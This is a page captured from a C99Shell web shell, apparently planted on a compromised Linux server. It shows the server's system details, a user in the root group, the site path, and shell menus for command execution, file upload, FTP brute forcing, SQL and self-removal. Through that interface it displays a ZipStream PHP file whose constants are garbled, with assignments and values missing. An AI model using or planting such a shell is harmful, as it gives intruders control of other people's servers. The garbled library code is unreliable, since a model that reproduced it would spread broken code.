!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/maennchen/zipstream-php/src/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     GeneralPurposeBitFlag.php (2.39 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
ZipStream;

/**
 * @internal
 */
abstract class GeneralPurposeBitFlag
{
    
/**
     * If set, indicates that the file is encrypted.
     */
    
public const ENCRYPTED << 0;

    
/**
     * (For Methods 8 and 9 - Deflating)
     * Normal (-en) compression option was used.
     */
    
public const DEFLATE_COMPRESSION_NORMAL << 1;

    
/**
     * (For Methods 8 and 9 - Deflating)
     * Maximum (-exx/-ex) compression option was used.
     */
    
public const DEFLATE_COMPRESSION_MAXIMUM << 1;

    
/**
     * (For Methods 8 and 9 - Deflating)
     * Fast (-ef) compression option was used.
     */
    
public const DEFLATE_COMPRESSION_FAST 10 << 1;

    
/**
     * (For Methods 8 and 9 - Deflating)
     * Super Fast (-es) compression option was used.
     */
    
public const DEFLATE_COMPRESSION_SUPERFAST 11 << 1;

    
/**
     * If the compression method used was type 14,
     * LZMA, then this bit, if set, indicates
     * an end-of-stream (EOS) marker is used to
     * mark the end of the compressed data stream.
     * If clear, then an EOS marker is not present
     * and the compressed data size must be known
     * to extract.
     */
    
public const LZMA_EOS << 1;

    
/**
     * If this bit is set, the fields crc-32, compressed
     * size and uncompressed size are set to zero in the
     * local header.  The correct values are put in the
     * data descriptor immediately following the compressed
     * data.
     */
    
public const ZERO_HEADER << 3;

    
/**
     * If this bit is set, this indicates that the file is
     * compressed patched data.
     */
    
public const COMPRESSED_PATCHED_DATA << 5;

    
/**
     * Strong encryption. If this bit is set, you MUST
     * set the version needed to extract value to at least
     * 50 and you MUST also set bit 0.  If AES encryption
     * is used, the version needed to extract value MUST
     * be at least 51.
     */
    
public const STRONG_ENCRYPTION << 6;

    
/**
     * Language encoding flag (EFS).  If this bit is set,
     * the filename and comment fields for this file
     * MUST be encoded using UTF-8.
     */
    
public const EFS << 11;

    
/**
     * Set when encrypting the Central Directory to indicate
     * selected data values in the Local Header are masked to
     * hide their actual values.
     */
    
public const ENCRYPT_CENTRAL_DIRECTORY << 13;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0061 ]--